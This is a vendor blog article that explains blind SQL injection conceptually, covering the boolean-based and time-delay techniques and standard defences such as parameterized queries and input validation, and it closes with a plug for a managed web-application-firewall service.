How Blind SQL Injection Works?

Blind SQL Injections (Blind SQLi) is the more time consuming and difficult to exploit (not impossible) sub-type of SQL Injections (SQLi). In this article, the anatomy of Blind SQLi, how to prevent SQL Injection/ Blind SQLi attacks and ways to fortify your security against it will be discussed in depth.

How Does Blind SQL Injection Works?

• In typical SQLi scenarios, when an input string is sent by an attacker to a vulnerable application, the results to the queries are sent back by the application with the unvalidated user inputs in an unsafe manner. Usually, user-controllable input fields are leveraged to send such malformed queries.
• Using these results, input strings are crafted and sent back by the attacker with SQL code instead of expected inputs.
• The arbitrary queries crafted by the attacker are interpreted by the backend database as an SQL command and executed.
• This way, access to the database or at least, the database name, version, internal structure, etc. is obtained by the attacker and used to reconstruct the database.
• In many cases, the application may be configured to not display the results to such malformed SQL queries and instead display a generic error message/ page without any useful information to the hacker.

Blind SQL Injection is used by attackers to exploit vulnerable applications and exfiltrate databases.

What is the Process of Blind SQLi?

If error pages/messages are displayed for malformed SQL queries, the error messages can be used by attackers to craft further attacks, termed as Error based SQLi attacks. Whereas, if a generic page/message is displayed in place of the error, the results are used by attackers to craft further attacks termed as Blind SQLi.

Using Content-based and/ or Time-Based SQLi, the difference in responses to different queries and input strings are analyzed by attackers to check if the syntax and structure of SQL Injection are successful. The responses are continuously analyzed to inject conditional queries to gain access to the database.

Given that the time and effort to orchestrate Blind SQLi are much more, sophisticated tools that leverage automation have been developed by attackers to reduce the time needed for research and identification of the SQL Injection vulnerabilities.

What Techniques are used for Blind SQLi?

1. The exploitation of Blind SQL Injection by triggering conditional responses

A series of Boolean-based (TRUE or FALSE) queries are asked by the attacker to the vulnerable application and the responses analyzed to gather information about the database. In essence, different responses are attempted to be triggered by different injected conditions.

2. The exploitation of Blind SQLi by triggering time delay

If the database errors are effectively detected and handled by the database, different responses to the injected SQL query are not received. Here, time delays are conditionally triggered by the attackers and analyzed.

How to Prevent SQL Injection Attacks?

Though the very different methods and tools are used for the orchestration of SQLi and Blind SQLi, the techniques for the prevention of both are very similar.

Secure Coding Practices

• Safe coding practices, irrespective of the language, and web development platform being used, that are in line with the secure coding guidelines of OWASP must be implemented.
• All legacy codes must be converted based on new libraries.
• Parameterized queries must be used instead of dynamic SQL queries. If there are dynamic SQL queries, they must be converted into parameterized queries.
• Stored procedures can also be used for SQLi mitigation.

Strong Input Validation

• All user inputs need to be filtered and sanitized to ensure that illegal characters/ content are not used.
• All special characters that can be used in user-input fields must be whitelisted.
• Input encoding needs to be used.

Other Measures

• Encryption of all databases.
• Minimal privileges
• Strict access control

Continuous, Intelligent and Effective Scanning

A comprehensive and intelligent scanning tool must be used for regular and on-demand scanning of the web application, right from the SDLC stage, to identify vulnerabilities and security misconfigurations continuously and effectively.

Fortify Web Application Security

To fortify web application security, scanning must be part of a robust, holistic, managed security solution like AppTrana that includes an always-on WAF, pen-testing, regular security audits, and the expert services of certified security professionals.

Conclusion

Does simply hiding the error messages stop Blind SQLi attacks from happening?
No.
It may become tougher and more time-consuming for the attacker but does not prevent SQL injections from occurring. With newer and more sophisticated ways to orchestrate Blind SQL Injection attacks being continuously developed, are you equipped to secure your application against them?